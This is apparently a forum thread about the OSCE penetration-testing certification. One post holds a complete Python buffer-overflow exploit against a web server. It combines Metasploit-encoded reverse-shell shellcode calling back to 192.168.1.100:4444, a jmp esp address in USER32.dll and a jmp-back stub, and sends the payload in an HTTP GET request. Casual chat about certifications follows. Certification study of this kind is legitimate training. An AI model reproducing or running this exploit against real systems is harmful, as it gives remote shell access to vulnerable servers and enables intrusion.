A good practice would also be to try to create exploits that utilize different exploitation techniques than the ones that are publicly available.

#!/usr/bin/python

import socket

# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 R |msfencode -a x86 -b "\x00" -t c
#

• x86/shikata_ga_nai succeeded with size 341 (iteration=1)

shell_reverse_tcp = ("\xba\xe7\x88\x98\x9a\xd9\xc3\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x4f\x31\x50\x14\x03\x50\x14\x83\xc0\x04\x05\x7d\x64\x72\x40"
"\x7e\x95\x83\x32\xf6\x70\xb2\x60\x6c\xf0\xe7\xb4\xe6\x54\x04"
"\x3f\xaa\x4c\x9f\x4d\x63\x62\x28\xfb\x55\x4d\xa9\xca\x59\x01"
"\x69\x4d\x26\x58\xbe\xad\x17\x93\xb3\xac\x50\xce\x3c\xfc\x09"
"\x84\xef\x10\x3d\xd8\x33\x11\x91\x56\x0b\x69\x94\xa9\xf8\xc3"
"\x97\xf9\x51\x58\xdf\xe1\xda\x06\xc0\x10\x0e\x55\x3c\x5a\x3b"
"\xad\xb6\x5d\xed\xfc\x37\x6c\xd1\x52\x06\x40\xdc\xab\x4e\x67"
"\x3f\xde\xa4\x9b\xc2\xd8\x7e\xe1\x18\x6d\x63\x41\xea\xd5\x47"
"\x73\x3f\x83\x0c\x7f\xf4\xc0\x4b\x9c\x0b\x05\xe0\x98\x80\xa8"
"\x27\x29\xd2\x8e\xe3\x71\x80\xaf\xb2\xdf\x67\xd0\xa5\xb8\xd8"
"\x74\xad\x2b\x0c\x0e\xec\x23\xe1\x3c\x0f\xb4\x6d\x37\x7c\x86"
"\x32\xe3\xea\xaa\xbb\x2d\xec\xcd\x91\x89\x62\x30\x1a\xe9\xab"
"\xf7\x4e\xb9\xc3\xde\xee\x52\x14\xde\x3a\xf4\x44\x70\x95\xb4"
"\x34\x30\x45\x5c\x5f\xbf\xba\x7c\x60\x15\xcd\xbb\xf7\x56\x66"
"\x42\x6c\x3f\x75\x44\x7d\xe3\xf0\xa2\x17\x0b\x55\x7d\x80\xb2"
"\xfc\xf5\x31\x3a\x2b\x9d\xd2\xa9\xb0\x5d\x9c\xd1\x6e\x0a\xc9"
"\x24\x67\xde\xe7\x1f\xd1\xfc\xf5\xc6\x1a\x44\x22\x3b\xa4\x45"
"\xa7\x07\x82\x55\x71\x87\x8e\x01\x2d\xde\x58\xff\x8b\x88\x2a"
"\xa9\x45\x66\xe5\x3d\x13\x44\x36\x3b\x1c\x81\xc0\xa3\xad\x7c"
"\x95\xdc\x02\xe9\x11\xa5\x7e\x89\xde\x7c\x3b\xb9\x94\xdc\x6a"
"\x52\x71\xb5\x2e\x3f\x82\x60\x6c\x46\x01\x80\x0d\xbd\x19\xe1"
"\x08\xf9\x9d\x1a\x61\x92\x4b\x1c\xd6\x93\x59")

# stack jmp  \xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1
jmp_back = "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1"

# jmp esp \x7E\x42\x93\x53 USER32.dll
jmp_esp = "\x53\x93\x42\x7E"

expl = "\x41" * 1271 + "\x42" * 517 + jmp_esp + "\x90" * 50 + jmp_back + "\x90" * 361

buff = "GET" + expl + "HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = sock.connect(("192.168.1.124",80))
sock.send(buff)
sock.close()

Hey ajohnson...last I saw you had WIP:OSCE in your sig. You're not already done and on to the next cert are you? If so...

Hm, maybe you just need to visit the forum more frequently; it said GCIA for about the last six weeks.

I put a very intense 4-6 months into the OSCE, so it's not like I just breezed through it.